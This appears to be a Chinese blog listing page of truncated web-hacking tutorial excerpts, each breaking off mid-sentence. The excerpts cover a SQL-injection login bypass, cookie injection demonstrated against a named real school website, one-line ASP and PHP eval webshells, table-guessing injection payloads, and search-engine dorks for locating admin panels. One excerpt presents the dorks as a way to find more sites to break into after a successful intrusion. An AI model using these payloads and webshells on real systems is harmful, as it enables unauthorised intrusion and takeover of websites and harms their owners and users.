原验证登陆语句:SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:SELECT * FROM admin 
先不提注入中转和cookie注入是什么意思,先看看一个我的操作首先打开http://www.aqvtc.cn/xygk/ShowArticle.asp?ArticleID=2,页面正常显示再次打开http://www.aqvtc.cn/xygk/ShowArticle.asp?   页面显示不正常,在当前页面F12执行javascript:alert(document.cookie="ArticleID=2");然后刷新页面发现正常显示ArticleID=
搭建模拟环境了解一句话木马的原理.(1).创建1.asp文件,代码如下:        <%eval request("value")%>       (2).创建2.php文件,代码如下:         <?php @eval(
首先看看基本的数据库表结构: 文章表:   id(文章id)  title(文章内容)   content(文章内容) 用户表:   id(用户id)  username(用户名)    password(用户密码)然后看看注入:    某个文章的链接如下:http://localhost/article.php?id=1,其SQL查询:select   title , content from
刚刚看完51cto的视频,实验发现思路不错但是不完美.首先看看下面的语句,意思是从tp_goods表筛选数据按照表中第一个字段排序SELECT   * from tp_goods  ORDER BY 1再首先看看下面的语句,意思是从tp_goods表筛选数据按照筛选的字段的第一个字段排序SELECT   id,title from tp_goods 
intitle:搜索网页标题包含的关键字intext:搜索网页正文包含的关键字或者词site:对特定的站点进行搜索inurl:对url的关键词进行搜索cache:缓存filetype:对特定的文件以上支持组合,例如查询某个网站后台(非100%有效,前提是搜索引擎已经记录)intitle:后台   stie:gaojiufeng.cn 成功入侵一个网站可以通过搜索引擎快速找到同样的站点
前面已经讲了关于是否存在注入点的说明.现在讲下关于阿D注入和明小子检测存在注入猜表猜字段的原理.(使用工具一定要知道工具原理,方便后期自己完善/开发工具)1.猜表的方法:http://xxx.com/ProductShow.asp?articleid=143 and exists(select * from [user])    //查询是否存在user表http://xxx.com/ProductShow.asp?articleid=143 and exists(selec
SQL注入是因为开发者没有过滤GET/POST的参数导致参数传入mysql语句拼接成注入语句导致.网上很多作者使用and 1=1   and 1=2来检测是否可以注入.例如http://xxxxxx.com/ProductShow.asp?articleid=143(详细地址不透漏.)ProductShow.asp用于显示指定的文章id的文章内容,其文件内容可能是:<% id=Request.QueryString("id") select&nbs
Top